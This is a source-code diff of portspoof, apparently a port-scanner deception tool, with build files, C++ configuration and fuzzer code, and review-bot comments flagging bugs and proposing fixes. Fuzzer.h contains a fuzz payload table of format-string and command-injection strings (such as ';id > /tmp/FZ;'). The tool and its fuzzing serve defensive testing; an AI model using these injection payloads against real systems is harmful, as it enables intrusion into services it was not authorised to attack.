/usr/include/sys/_posix_availability.h /usr/include/machine/types.h \
|
||||
/usr/include/i386/types.h /usr/include/i386/_types.h \
|
||||
/usr/include/sys/_types.h /usr/include/machine/_types.h \
|
||||
/usr/include/machine/endian.h /usr/include/i386/endian.h \
|
||||
/usr/include/sys/_endian.h /usr/include/libkern/_OSByteOrder.h \
|
||||
/usr/include/libkern/i386/_OSByteOrder.h /usr/include/sys/_structs.h \
|
||||
/usr/include/machine/_param.h /usr/include/i386/_param.h \
|
||||
/usr/include/Availability.h /usr/include/AvailabilityInternal.h \
|
||||
/usr/include/assert.h /usr/include/net/if.h /usr/include/net/if_var.h \
|
||||
/usr/include/stdint.h /usr/include/sys/time.h /usr/include/time.h \
|
||||
/usr/include/_types.h /usr/include/_structs.h \
|
||||
/usr/include/sys/_select.h /usr/include/sys/queue.h \
|
||||
/usr/include/sys/ioctl.h /usr/include/sys/ttycom.h \
|
||||
/usr/include/sys/ioccom.h /usr/include/sys/filio.h \
|
||||
/usr/include/sys/sockio.h /usr/include/sys/stat.h \
|
||||
/usr/include/netinet/in.h /usr/include/netinet6/in6.h \
|
||||
/usr/include/sys/sysctl.h /usr/include/sys/ucred.h \
|
||||
/usr/include/sys/param.h /usr/include/sys/syslimits.h \
|
||||
/usr/include/machine/param.h /usr/include/i386/param.h \
|
||||
/usr/include/i386/_param.h \
|
||||
/usr/llvm-gcc-4.2/bin/../lib/gcc/i686-apple-darwin11/4.2.1/include/limits.h \
|
||||
/usr/llvm-gcc-4.2/bin/../lib/gcc/i686-apple-darwin11/4.2.1/include/syslimits.h \
|
||||
/usr/include/limits.h /usr/include/machine/limits.h \
|
||||
/usr/include/i386/limits.h /usr/include/i386/_limits.h \
|
||||
/usr/include/sys/signal.h /usr/include/machine/signal.h \
|
||||
/usr/include/i386/signal.h /usr/include/i386/_structs.h \
|
||||
/usr/include/machine/_structs.h /usr/include/mach/i386/_structs.h \
|
||||
/usr/include/bsm/audit.h /usr/include/mach/port.h \
|
||||
/usr/include/mach/boolean.h /usr/include/mach/machine/boolean.h \
|
||||
/usr/include/mach/i386/boolean.h /usr/include/mach/machine/vm_types.h \
|
||||
/usr/include/mach/i386/vm_types.h /usr/include/mach/i386/vm_param.h \
|
||||
/usr/include/sys/proc.h /usr/include/sys/select.h \
|
||||
/usr/include/sys/lock.h /usr/include/sys/event.h /usr/include/sys/vm.h \
|
||||
/usr/include/netdb.h /usr/include/fcntl.h /usr/include/sys/fcntl.h \
|
||||
/usr/include/err.h /usr/include/errno.h /usr/include/sys/errno.h \
|
||||
/usr/include/stdio.h /usr/include/secure/_stdio.h \
|
||||
/usr/include/secure/_common.h revregex.h /usr/include/string.h \
|
||||
/usr/include/strings.h /usr/include/secure/_string.h \
|
||||
/usr/include/stdlib.h /usr/include/sys/wait.h \
|
||||
/usr/include/sys/resource.h /usr/include/alloca.h /usr/include/ctype.h \
|
||||
/usr/include/runetype.h threads.h porspoof.h
|
||||
|
||||
connection.h:
|
||||
|
||||
/usr/include/sys/socket.h:
|
||||
|
||||
/usr/include/sys/types.h:
|
||||
|
||||
/usr/include/sys/appleapiopts.h:
|
||||
|
||||
/usr/include/sys/cdefs.h:
|
||||
|
||||
/usr/include/sys/_symbol_aliasing.h:
|
||||
|
||||
/usr/include/sys/_posix_availability.h:
|
||||
|
||||
/usr/include/machine/types.h:
|
||||
|
||||
/usr/include/i386/types.h:
|
||||
|
||||
/usr/include/i386/_types.h:
|
||||
|
||||
/usr/include/sys/_types.h:
|
||||
|
||||
/usr/include/machine/_types.h:
|
||||
|
||||
/usr/include/machine/endian.h:
|
||||
|
||||
/usr/include/i386/endian.h:
|
||||
|
||||
/usr/include/sys/_endian.h:
|
||||
|
||||
/usr/include/libkern/_OSByteOrder.h:
|
||||
|
||||
/usr/include/libkern/i386/_OSByteOrder.h:
|
||||
|
||||
/usr/include/sys/_structs.h:
|
||||
|
||||
/usr/include/machine/_param.h:
|
||||
|
||||
/usr/include/i386/_param.h:
|
||||
|
||||
/usr/include/Availability.h:
|
||||
|
||||
/usr/include/AvailabilityInternal.h:
|
||||
|
||||
/usr/include/assert.h:
|
||||
|
||||
/usr/include/net/if.h:
|
||||
|
||||
/usr/include/net/if_var.h:
|
||||
|
||||
/usr/include/stdint.h:
|
||||
|
||||
/usr/include/sys/time.h:
|
||||
|
||||
/usr/include/time.h:
|
||||
|
||||
/usr/include/_types.h:
|
||||
|
||||
/usr/include/_structs.h:
|
||||
|
||||
/usr/include/sys/_select.h:
|
||||
|
||||
/usr/include/sys/queue.h:
|
||||
|
||||
/usr/include/sys/ioctl.h:
|
||||
|
||||
/usr/include/sys/ttycom.h:
|
||||
|
||||
/usr/include/sys/ioccom.h:
|
||||
|
||||
/usr/include/sys/filio.h:
|
||||
|
||||
/usr/include/sys/sockio.h:
|
||||
|
||||
/usr/include/sys/stat.h:
|
||||
|
||||
/usr/include/netinet/in.h:
|
||||
|
||||
/usr/include/netinet6/in6.h:
|
||||
|
||||
/usr/include/sys/sysctl.h:
|
||||
|
||||
/usr/include/sys/ucred.h:
|
||||
|
||||
/usr/include/sys/param.h:
|
||||
|
||||
/usr/include/sys/syslimits.h:
|
||||
|
||||
/usr/include/machine/param.h:
|
||||
|
||||
/usr/include/i386/param.h:
|
||||
|
||||
/usr/include/i386/_param.h:
|
||||
|
||||
/usr/llvm-gcc-4.2/bin/../lib/gcc/i686-apple-darwin11/4.2.1/include/limits.h:
|
||||
|
||||
/usr/llvm-gcc-4.2/bin/../lib/gcc/i686-apple-darwin11/4.2.1/include/syslimits.h:
|
||||
|
||||
/usr/include/limits.h:
|
||||
|
||||
/usr/include/machine/limits.h:
|
||||
|
||||
/usr/include/i386/limits.h:
|
||||
|
||||
/usr/include/i386/_limits.h:
|
||||
|
||||
/usr/include/sys/signal.h:
|
||||
|
||||
/usr/include/machine/signal.h:
|
||||
|
||||
/usr/include/i386/signal.h:
|
||||
|
||||
/usr/include/i386/_structs.h:
|
||||
|
||||
/usr/include/machine/_structs.h:
|
||||
|
||||
/usr/include/mach/i386/_structs.h:
|
||||
|
||||
/usr/include/bsm/audit.h:
|
||||
|
||||
/usr/include/mach/port.h:
|
||||
|
||||
/usr/include/mach/boolean.h:
|
||||
|
||||
/usr/include/mach/machine/boolean.h:
|
||||
|
||||
/usr/include/mach/i386/boolean.h:
|
||||
|
||||
/usr/include/mach/machine/vm_types.h:
|
||||
|
||||
/usr/include/mach/i386/vm_types.h:
|
||||
|
||||
/usr/include/mach/i386/vm_param.h:
|
||||
|
||||
/usr/include/sys/proc.h:
|
||||
|
||||
/usr/include/sys/select.h:
|
||||
|
||||
/usr/include/sys/lock.h:
|
||||
|
||||
/usr/include/sys/event.h:
|
||||
|
||||
/usr/include/sys/vm.h:
|
||||
|
||||
/usr/include/netdb.h:
|
||||
|
||||
/usr/include/fcntl.h:
|
||||
|
||||
/usr/include/sys/fcntl.h:
|
||||
|
||||
/usr/include/err.h:
|
||||
|
||||
/usr/include/errno.h:
|
||||
|
||||
/usr/include/sys/errno.h:
|
||||
|
||||
/usr/include/stdio.h:
|
||||
|
||||
/usr/include/secure/_stdio.h:
|
||||
|
||||
/usr/include/secure/_common.h:
|
||||
|
||||
revregex.h:
|
||||
|
||||
/usr/include/string.h:
|
||||
|
||||
/usr/include/strings.h:
|
||||
|
||||
/usr/include/secure/_string.h:
|
||||
|
||||
/usr/include/stdlib.h:
|
||||
|
||||
/usr/include/sys/wait.h:
|
||||
|
||||
/usr/include/sys/resource.h:
|
||||
|
||||
/usr/include/alloca.h:
|
||||
|
||||
/usr/include/ctype.h:
|
||||
|
||||
/usr/include/runetype.h:
|
||||
|
||||
threads.h:
|
||||
|
||||
porspoof.h:
|
1
src/src/.deps/portspoof-connection.Po
Normal file
1
src/src/.deps/portspoof-connection.Po
Normal file
@ -0,0 +1 @@
|
||||
# dummy
|
1
src/src/.deps/portspoof-portspoof.Po
Normal file
1
src/src/.deps/portspoof-portspoof.Po
Normal file
@ -0,0 +1 @@
|
||||
# dummy
|
1
src/src/.deps/portspoof-revregex.Po
Normal file
1
src/src/.deps/portspoof-revregex.Po
Normal file
@ -0,0 +1 @@
|
||||
# dummy
|
1
src/src/.deps/portspoof.Po
Normal file
1
src/src/.deps/portspoof.Po
Normal file
@ -0,0 +1 @@
|
||||
# dummy
|
1
src/src/.deps/revregex.Po
Normal file
1
src/src/.deps/revregex.Po
Normal file
@ -0,0 +1 @@
|
||||
# dummy
|
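--- a/src/src/Configuration.cpp
+++ b/src/src/Configuration.cpp
@@ -0,0 +1,282 @@
+#include "Configuration.h"
+
+Configuration::Configuration()
+{
+configfile = std::string(CONF_FILE);
+signaturefile = std::string(SIGNATURE_FILE);
+logfile = std::string(LOG_FILE);
+bind_ip=std::string();
+port=DEFAULT_PORT;
+opts=0;
+nmapfuzzsignatures_file = std::string(NMAP_FUZZ_FILE_SIG);
+fuzzpayload_file = std::string(FUZZ_FILE_PAYLOAD);
+
+return;
+}
+
+bool Configuration::getConfigValue(int value)
+{
+return this->opts[value];
+}
+
+void Configuration::usage(void)
+{
+fprintf(stdout,"Usage: portspoof [OPTION]...\n"
+"Portspoof - service signature obfuscator.\n\n"
+"-i bind to a user defined IP address\n"
+"-p bind to a user defined PORT number\n"
+"-s custom signture file\n"
+"-c configuration file\n"
+"-l log port scanning alerts to a file\n"
+"-d disable syslog\n"
+"-v be verbose\n"
+"-f read fuzz payload list\n"
+"-1 generate fuzzing payloads\n"
+"-n nmap wrap fuzz signatures\n"
+"-h display this help and exit\n\n"
+"Without any OPTION - use default values and continue\n");
+
+exit(1);
+}
+
+bool Configuration::processArgs(int argc, char** argv)
+{
+int ch;
+extern char *__progname;
+
+while ((ch = getopt(argc, argv,"l:i:p:s:c:f:n:dvh123")) != -1) {
+switch (ch) {
+case 'i':
+this->bind_ip = std::string(optarg);
+this->opts[OPT_IP]=1;
+break;
+case 'p':
+this->port = atoi(optarg);
+this->opts[OPT_PORT]=1;
+break;
+case 's':
+this->signaturefile = std::string(optarg);
+this->opts[OPT_SIG_FILE]=1;
+
+break;
+case 'c':
+this->configfile = std::string(optarg);
+this->opts[OPT_CONFIG_FILE]=1;
+
+break;
+case 'v':
+this->opts[OPT_DEBUG]=1;
+fprintf(stdout,"-> Verbose mode on.\n");
+break;
+case 'd':
+this->opts[OPT_SYSLOG_DIS]=1;
+fprintf(stdout,"-> Syslog logging disabled.\n");
+break;
+case 'l':
+this->opts[OPT_LOG_FILE]=1;
+this->logfile = std::string(optarg);
+fprintf(stdout,"-> Using log file %s\n",this->logfile.c_str());
+break;
+case 'f':
+this->opts[OPT_FUZZ_WORDLIST]=1;
+this->fuzzpayload_file=std::string(optarg);
+fprintf(stdout,"-> Reading fuzzing payloads from a file!\n");
+break;
+case 'n':
+this->opts[OPT_FUZZ_NMAP]=1;
+this->nmapfuzzsignatures_file=std::string(optarg);
+fprintf(stdout,"-> NMAP wrapper mode!\n");
+break;
+case '1':
+this->opts[OPT_FUZZ_INTERNAL]=1;
+fprintf(stdout,"-> Generate fuzzing payloads!\n");
+break;
+case '2':
+this->opts[OPT_NOT_NMAP_SCANNER]=1;
+fprintf(stdout,"-> Switching to simple reply mode (anything apart from Nmap)!\n");
+break;
+case '3':
+this->opts[OPT_FUZZ_RANDOM]=1;
+fprintf(stdout,"-> Random int fuzzing!\n");
+break;
+case 'h':
+this->usage();
+break;
+default:
+fprintf(stdout,"Try ` %s -h' for more information.\n\n", __progname);
+exit(0);
+break;
+}
+}
+
+
+if(this->opts==0)
+{
+fprintf(stdout,"-> No parameters - using default values.\n");
+}
+
+if(this->getConfigValue(OPT_FUZZ_NMAP) ||this->getConfigValue(OPT_FUZZ_WORDLIST) || this->getConfigValue(OPT_FUZZ_INTERNAL))
+this->fuzzer=new Fuzzer(this);
+
+
+return 0;
+}
+
+std::string Configuration::getConfigFile()
+{
+return this->configfile;
+}
+std::string Configuration::getSignatureFile()
+{
+return this->signaturefile;
+
+}
+std::string Configuration::getNmapfuzzSignaturesFile()
+{
+return this->nmapfuzzsignatures_file;
+}
+std::string Configuration::getFuzzPayloadFile()
+{
+return this->fuzzpayload_file;
+
+}
+std::string Configuration::getLogFile()
+{
+return this->logfile;
+}
+
+std::string Configuration::getBindIP()
+{
+return this->bind_ip;
+}
+
+unsigned short int Configuration::getPort()
+{
+return this->port;
+}
+
+std::vector<char> Configuration::mapPort2Signature(unsigned short port)
+{
+/*
+if(this->opts&OPT_FUZZ_WORDLIST
+{
+
+std::string input_line;
+std::getline(std::cin, input_line);
+std::vector<char> result_vector;
+
+for(int i=0; i<input_line.length();i++)
+result_vector.push_back(input_line[i]);
+return result_vector;
+
+}
+*/
+if(this->opts[OPT_FUZZ_NMAP] || this->opts[OPT_FUZZ_INTERNAL] || this->opts[OPT_FUZZ_WORDLIST])
+{
+std::vector<char> result_vector;
+result_vector=this->fuzzer->GetFUZZ();
+return result_vector;
+}
+else
+return this->portsignatureemap[port];
+}
+
+bool Configuration::processSignatureFile()
+{
+
+char buf_file[BUFSIZE];
+
+FILE *fp = fopen(this->signaturefile.c_str(), "r");
+if (fp == NULL) {
+fprintf(stdout,"Error opening signature file: %s \n",this->signaturefile.c_str());
+return 1;
+}
+
+while (fgets(buf_file, BUFSIZE, fp))
+rawsignatures.push_back(std::string(buf_file));
+
+fclose(fp);
+
+// set random mapping
+//srand((unsigned)time(0));
+for(int i=0;i<MAX_PORTS;i++)
+{
+//portsignatureemap.insert(make_pair(i,process_signature(rawsignatures[rand()%rawsignatures.size()])));
+portsignatureemap.insert(make_pair(i,process_signature(rawsignatures[i%rawsignatures.size()])));
+
+}
+
+
+return 0;
+
+}
+
+bool Configuration::readConfigFile()
+{
+char tmp[BUFSIZE], str1[BUFSIZE], str2[BUFSIZE];
+int lp,hp;
+std::stringstream ss;
+
+
+FILE *fp = fopen(this->configfile.c_str(), "r");
+if (fp == NULL) {
+fprintf(stdout,"Error opening file: %s \n",this->configfile.c_str());
+return 1;
+}
+
+while (fgets(tmp, BUFSIZE, fp))
+if (strlen(tmp) >1 && tmp[0]!='#')
+{
+
+if(sscanf(tmp, "%s %s",str1,str2)==EOF){
+fprintf(stdout,"Error in configuration file");
+exit(1);
+}
+
+if(str1==NULL || str2==NULL)
+{
+fprintf(stdout,"Error in configuration file");
+exit(1);
+}
+
+if(Utils::isNumeric(str1)) //single port
+{
+sscanf(str1,"%d",&lp);
+//DEBUG
+//fprintf(stdout,"port %d value: %s\n",lp,Utils::get_substring_value(tmp));
+
+portsignatureemap[lp]=process_signature(std::string(Utils::get_substring_value(tmp)));
+continue;
+}
+else
+{
+if(sscanf(str1, "%d-%d",&lp,&hp)==EOF){
+fprintf(stdout,"Error in configuration file\n");
+exit(1);
+}
+
+if(lp==0 || hp==0)
+{
+fprintf(stdout,"Error in configuration file");
+exit(1);
+}
+
+//DEBUG
+//fprintf(stdout,"range port %d-%d value: %s\n",lp,hp,Utils::get_substring_value(tmp));
+
+for(int i=lp;i<=hp;i++)
+portsignatureemap[i]=process_signature(std::string(Utils::get_substring_value(tmp)));
+
+continue;
+
+}
+
+}
+
+fclose(fp);
+
+
+return 0;
+
+}
+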
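Review bot: readConfigFile() compares both sscanf() calls with EOF instead of the expected conversion count, so a line with only one token passes the first check, and a range missing its second number leaves `hp` uninitialised before it is compared and used as the loop bound; the `str1==NULL || str2==NULL` test can never fire because both are arrays. Checking the count and the bounds closes this: `if(sscanf(tmp, "%s %s",str1,str2)!=2)` and `if(sscanf(str1, "%d-%d",&lp,&hp)!=2 || lp<=0 || hp>65535 || lp>hp)`. Without the bounds an oversized `hp` keeps the range loop running far past the last port while the `unsigned short` map key wraps and overwrites earlier entries. processSignatureFile() has a related gap: an empty signature file leaves `rawsignatures.size()` at 0, so `i%rawsignatures.size()` divides by zero, and the function should return an error when `rawsignatures.empty()`.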
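--- a/src/src/Configuration.h
+++ b/src/src/Configuration.h
@@ -0,0 +1,94 @@
+#ifndef CONFIG_H
+#define CONFIG_H
+
+#define CONFSEPARATOR "/"
+#define DEFAULT_PORT 4444
+#define BUFSIZE 1024
+
+#define LOG_FILE "portspoof.log"
+#define CONF_FILE "portspoof.conf"
+#define SIGNATURE_FILE "signatures"
+#define OPT_FUZZ_WORDLIST 1
+#define OPT_IP 2
+#define OPT_PORT 3
+#define OPT_DEBUG 4
+#define OPT_SIG_FILE 5
+#define OPT_LOG_FILE 6
+#define OPT_SYSLOG_DIS 7
+#define OPT_CONFIG_FILE 8
+#define OPT_FUZZ_NMAP 9
+#define OPT_FUZZ_INTERNAL 10
+#define OPT_NOT_NMAP_SCANNER 11
+#define OPT_FUZZ_RANDOM 12
+
+#define MAX_PORTS 65535
+
+#define NMAP_FUZZ_FILE_SIG "nmapfuzzsignatures"
+#define FUZZ_FILE_PAYLOAD "nmapfuzzpayloads"
+
+#include <string>
+#include <stdio.h>
+#include <ctype.h>
+#include <pcap.h>
+#include <map>
+#include <vector>
+#include <sstream>
+#include <unistd.h>
+#include <algorithm>
+#include <iostream>
+#include <ctime>
+#include <bitset>
+
+#include "revregex.h"
+#include "connection.h"
+
+#include "Utils.h"
+
+using namespace std;
+
+
+typedef map < unsigned short, std::vector<char> > Port_Signature_Map;
+typedef vector < string > Raw_Signatures_Vector;
+typedef vector < string > Nmap_Fuzz_Vector;
+class Fuzzer;
+
+#include "Fuzzer.h"
+
+
+class Configuration {
+private:
+std::string configfile;
+std::string signaturefile;
+std::string logfile;
+std::string bind_ip;
+unsigned short int port;
+bitset<20> opts;
+Fuzzer* fuzzer;
+std::string nmapfuzzsignatures_file;
+std::string fuzzpayload_file;
+Port_Signature_Map portsignatureemap;
+Raw_Signatures_Vector rawsignatures;
+
+
+public:
+Configuration();
+void usage(void);
+bool processArgs(int argc, char** argv);
+bool readConfigFile();
+std::vector<char> mapPort2Signature(unsigned short port);
+bool processSignatureFile();
+
+//getters
+std::string getConfigFile();
+std::string getSignatureFile();
+std::string getLogFile();
+std::string getBindIP();
+std::string getNmapfuzzSignaturesFile();
+std::string getFuzzPayloadFile();
+bool getConfigValue(int value);
+unsigned short int getPort();
+
+};
+
+
+#endif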
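Review bot: `MAX_PORTS` is defined as 65535 but processSignatureFile() in Configuration.cpp uses it as an exclusive bound (`i<MAX_PORTS`), so port 65535 never receives a signature there and, unless the configuration file assigns one, `mapPort2Signature` returns the empty vector that `portsignatureemap[port]` default-inserts. Either define the count, `#define MAX_PORTS 65536`, or loop with `i<=MAX_PORTS`. A one-line comment on the macro saying whether it is the highest port number or the number of ports would keep the header and its users in agreement.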
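--- a/src/src/Fuzzer.cpp
+++ b/src/src/Fuzzer.cpp
@@ -0,0 +1,182 @@
+#include "Fuzzer.h"
+
+Fuzzer::Fuzzer()
+{
+
+
+return;
+}
+
+Fuzzer::Fuzzer(Configuration* configuration)
+{
+
+this->configuration = configuration;
+this->nmapfuzzsignatures_file = configuration->getNmapfuzzSignaturesFile();
+this->fuzzpayload_file = configuration->getFuzzPayloadFile();
+this->counter=0;
+this->payload_counter=0;
+this->PrepareFuzzer();
+
+return;
+}
+
+
+bool Fuzzer::PrepareFuzzer()
+{
+
+if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
+{
+
+this->fp_payloads=fopen(this->fuzzpayload_file.c_str(), "r");
+if ( this->fp_payloads == NULL) {
+fprintf(stdout,"Error opening payload file: %s \n",this->fuzzpayload_file.c_str());
+return 1;
+}
+
+}
+/////
+
+if(this->configuration->getConfigValue(OPT_FUZZ_NMAP))
+{
+
+FILE *fp = fopen(this->nmapfuzzsignatures_file.c_str(), "r");
+if (fp == NULL) {
+fprintf(stdout,"Error opening nmap signature file: %s \n",this->nmapfuzzsignatures_file.c_str());
+return 1;
+}
+
+char buf_file[BUFSIZE];
+while (fgets(buf_file, BUFSIZE, fp))
+nmapfuzzsignatures.push_back(std::string(buf_file));
+fclose(fp);
+fprintf(stdout,"-> Nmap signatures read: %d \n",this->nmapfuzzsignatures.size());
+
+}
+
+return 0;
+
+}
+
+std::vector<char> Fuzzer::intToBytes(int paramInt)
+{
+vector<char> arrayOfByte(4);
+for (int i = 0; i < 4; i++)
+arrayOfByte[3 - i] = (paramInt >> (i * 8));
+return arrayOfByte;
+}
+
+
+std::vector<char> Fuzzer::shortToBytes(unsigned short paramInt)
+{
+vector<char> arrayOfByte(2);
+for (int i = 0; i < 2; i++)
+arrayOfByte[1 - i] = (paramInt >> (i * 4));
+return arrayOfByte;
+}
+
+std::vector<char> Fuzzer::GenerateFuzzPayload()
+{
+std::vector<char> result_vector;
+std::string str;
+
+/*
+for(int i=0;i<255;i++)
+result_vector.push_back(i);
+
+return result_vector;
+
+
+
+if(this->configuration->getConfigValue(OPT_FUZZ_RANDOM))
+{
+this->payload_counter++;
+return this->shortToBytes((unsigned short)this->payload_counter);
+
+}
+*/
+
+if(this->payload_counter<10)
+{
+for(int i=0;i<4000*(this->payload_counter+1);i++)
+result_vector.push_back(*(fuzz_oracle[0]));
+}
+else
+{
+
+str=std::string(fuzz_oracle[this->payload_counter-9]);
+result_vector=Utils::str2vector(str);
+}
+
+this->payload_counter++;
+
+if(this->payload_counter>=25)
+this->payload_counter=0;
+
+return result_vector;
+
+}
+
+std::vector<char> Fuzzer::GetFUZZ()
+{
+std::vector<char> result_vector;
+
+if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
+{
+
+
+if(this->counter%this->nmapfuzzsignatures.size()==0)
+{
+
+char buf_file[BUFSIZE];
+std::string str;
+
+if(fgets(buf_file, BUFSIZE, this->fp_payloads)==NULL)
+{
+fprintf(stdout,"EOF of payload file\n");
+fflush(stdout);
+}
+
+str=std::string(buf_file);
+str.erase(str.size() - 1);//remove \n
+this->input_line=Utils::str2vector(str);
+
+}
+
+this->counter++;
+
+}
+else if(this->configuration->getConfigValue(OPT_FUZZ_INTERNAL))
+{
+result_vector=this->GenerateFuzzPayload();
+}
+else
+fprintf(stdout,"Fuzz - shouldn't be here...\n");
+
+
+if(this->configuration->getConfigValue(OPT_FUZZ_NMAP))
+{
+
+if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
+result_vector=Utils::wrapNMAP(this->nmapfuzzsignatures[this->counter%this->nmapfuzzsignatures.size()],this->input_line);
+else if(this->configuration->getConfigValue(OPT_FUZZ_INTERNAL))
+result_vector=Utils::wrapNMAP(this->nmapfuzzsignatures[this->counter%this->nmapfuzzsignatures.size()],result_vector);
+
+result_vector=Utils::unescape(result_vector);
+
+}
+
+return result_vector;
+
+
+}
+
+
+/*
+std::string input_line;
+std::getline(std::cin, input_line);
+
+
+for(int i=0; i<input_line.length();i++)
+result_vector.push_back(input_line[i]);
+return result_vector;
+*/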
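Review bot: GetFUZZ() computes `this->counter%this->nmapfuzzsignatures.size()` inside the OPT_FUZZ_WORDLIST branch, but PrepareFuzzer() fills that vector only when OPT_FUZZ_NMAP is set, so running with `-f` alone divides by zero. The same branch carries on after fgets() returns NULL: `buf_file` is then uninitialised when it is copied into `str`, and `str.erase(str.size() - 1)` throws on an empty string. The constructor also discards PrepareFuzzer()'s result, so a payload file that failed to open leaves `fp_payloads` NULL for that fgets(). The rewritten branch below guards each of these; what to serve once the payload file is exhausted is a design choice, and returning an empty reply is only one option.

```cpp
if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
{
    const size_t signature_count=this->nmapfuzzsignatures.size();

    // No signatures loaded (no -n): fetch a new payload on every call instead of dividing by zero.
    if(signature_count==0 || this->counter%signature_count==0)
    {
        char buf_file[BUFSIZE];

        if(this->fp_payloads==NULL || fgets(buf_file, BUFSIZE, this->fp_payloads)==NULL)
        {
            fprintf(stdout,"EOF of payload file\n");
            fflush(stdout);
            return result_vector; // nothing was read; do not touch buf_file
        }

        std::string str(buf_file);
        if(!str.empty() && str[str.size() - 1]=='\n')
            str.erase(str.size() - 1);//remove \n
        this->input_line=Utils::str2vector(str);
    }

    this->counter++;
}
// … unchanged: OPT_FUZZ_INTERNAL branch, nmap wrapping and return …
```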
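--- a/src/src/Fuzzer.h
+++ b/src/src/Fuzzer.h
@@ -0,0 +1,75 @@
+#ifndef FUZZER_H
+#define FUZZER_H
+
+#include <string>
+#include <stdio.h>
+#include <ctype.h>
+#include <pcap.h>
+#include <map>
+#include <vector>
+#include <sstream>
+#include <unistd.h>
+#include <algorithm>
+#include <iostream>
+#include <ctime>
+#include <pthread.h>
+#include <iostream>
+#include <string>
+#include <iostream>
+#include <fstream>
+#include <sstream>
+
+#include "Utils.h"
+#include "Configuration.h"
+
+using namespace std;
+
+
+static const char* const fuzz_oracle[]=
+{
+"A",
+"%n%n%n%n%n",
+"%%20n",
+"%n%p%s%d%x",
+"%.1024d",
+"%.2049d",
+"-1",
+"32767",
+"65535",
+"-2147483647",
+"0xffffffff",
+"a|id > /tmp/FZ|b",
+"a`id > /tmp/FZ`b",
+"a'id > /tmp/FZ'b",
+"a;id > /tmp/FZ;b",
+"a&&id > /tmp/FZ&&b"
+};
+
+
+class Fuzzer{
+private:
+
+std::string nmapfuzzsignatures_file;
+std::string fuzzpayload_file;
+Nmap_Fuzz_Vector nmapfuzzsignatures;
+FILE *fp_payloads;
+std::vector<char> input_line;
+Configuration* configuration;
+int counter;
+int payload_counter;
+int nmapfuzzsignatures_size;
+
+public:
+Fuzzer();
+Fuzzer(Configuration* configuration);
+bool processSignatureFile();
+std::vector<char> GetFUZZ();
+std::vector<char> GenerateFuzzPayload();
+std::vector<char> intToBytes(int paramInt);
+std::vector<char> shortToBytes(unsigned short paramInt);
+
+bool PrepareFuzzer();
+};
+
+
+#endif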
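Review bot: `fuzz_oracle` has 16 entries, and GenerateFuzzPayload() in Fuzzer.cpp stays inside it only because of the literals 10, 9 and 25 (`fuzz_oracle[this->payload_counter-9]` peaks at index 15 before the counter resets). Nothing ties those numbers to the table, so removing an entry turns the last lookups into an out-of-bounds read. Declaring the length next to the table, `static const size_t fuzz_oracle_count = sizeof(fuzz_oracle)/sizeof(fuzz_oracle[0]);`, and resetting at `9+fuzz_oracle_count` instead of 25 keeps the two in step. The table would also be better defined once in Fuzzer.cpp, since a `static` array in a header is duplicated in every file that includes it.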
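--- a/src/src/Makefile.am
+++ b/src/src/Makefile.am
@@ -0,0 +1,17 @@
+## Process this file with automake to produce Makefile.in
+
+# File lists
+headers = connection.h portspoof.h revregex.h threads.h log.h config_file.h
+sources = connection.c portspoof.c revregex.c log.c config_file.c
+
+# Unix executables
+bin_PROGRAMS = portspoof
+portspoof_SOURCES = $(headers) $(sources)
+
+# Threads
+portspoof_LDFLAGS = @LDFLAGS@ -pthread
+
+#Preprocessor detinitions
+portspoof_CPPFLAGS = -DCONFDIR='"$(sysconfdir)"'
+
+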
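Review bot: `sources` lists only the C files (`connection.c portspoof.c revregex.c log.c config_file.c`), so the Configuration.cpp and Fuzzer.cpp added alongside it in src/src would not be compiled by this Makefile.am. If this directory is meant to build the C++ code, the new `.cpp` files and their headers need adding to `sources` and `headers`, and configure needs a C++ compiler check; whether another build file covers them is not visible here. If src/src is instead a leftover copy of an older tree, dropping it together with the generated `.deps` files and Makefile.in would keep stale build inputs out of the repository.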
526
src/src/Makefile.in
Normal file
526
src/src/Makefile.in
Normal file
@ -0,0 +1,526 @@
|
||||
# Makefile.in generated by automake 1.10 from Makefile.am.
|
||||
# @configure_input@
|
||||
|
||||
# Copyright (C) 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002,
|
||||
# 2003, 2004, 2005, 2006 Free Software Foundation, Inc.
|
||||
# This Makefile.in is free software; the Free Software Foundation
|
||||
# gives unlimited permission to copy and/or distribute it,
|
||||
# with or without modifications, as long as this notice is preserved.
|
||||
|
||||
# This program is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY, to the extent permitted by law; without
|
||||
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A
|
||||
# PARTICULAR PURPOSE.
|
||||
|
||||
@SET_MAKE@
|
||||
|
||||
VPATH = @srcdir@
|
||||
pkgdatadir = $(datadir)/@PACKAGE@
|
||||
pkglibdir = $(libdir)/@PACKAGE@
|
||||
pkgincludedir = $(includedir)/@PACKAGE@
|
||||
am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd
|
||||
install_sh_DATA = $(install_sh) -c -m 644
|
||||
install_sh_PROGRAM = $(install_sh) -c
|
||||
install_sh_SCRIPT = $(install_sh) -c
|
||||
INSTALL_HEADER = $(INSTALL_DATA)
|
||||
transform = $(program_transform_name)
|
||||
NORMAL_INSTALL = :
|
||||
PRE_INSTALL = :
|
||||
POST_INSTALL = :
|
||||
NORMAL_UNINSTALL = :
|
||||
PRE_UNINSTALL = :
|
||||
POST_UNINSTALL = :
|
||||
build_triplet = @build@
|
||||
host_triplet = @host@
|
||||
bin_PROGRAMS = portspoof$(EXEEXT)
|
||||
subdir = src
|
||||
DIST_COMMON = $(srcdir)/Makefile.am $(srcdir)/Makefile.in \
|
||||
$(srcdir)/config.h.in
|
||||
ACLOCAL_M4 = $(top_srcdir)/aclocal.m4
|
||||
am__aclocal_m4_deps = $(top_srcdir)/configure.in
|
||||
am__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \
|
||||
$(ACLOCAL_M4)
|
||||
mkinstalldirs = $(install_sh) -d
|
||||
CONFIG_HEADER = config.h
|
||||
CONFIG_CLEAN_FILES =
|
||||
am__installdirs = "$(DESTDIR)$(bindir)"
|
||||
binPROGRAMS_INSTALL = $(INSTALL_PROGRAM)
|
||||
PROGRAMS = $(bin_PROGRAMS)
|
||||
am__objects_1 =
|
||||
am__objects_2 = portspoof-connection.$(OBJEXT) \
|
||||
portspoof-portspoof.$(OBJEXT) portspoof-revregex.$(OBJEXT) \
|
||||
portspoof-log.$(OBJEXT) portspoof-config_file.$(OBJEXT)
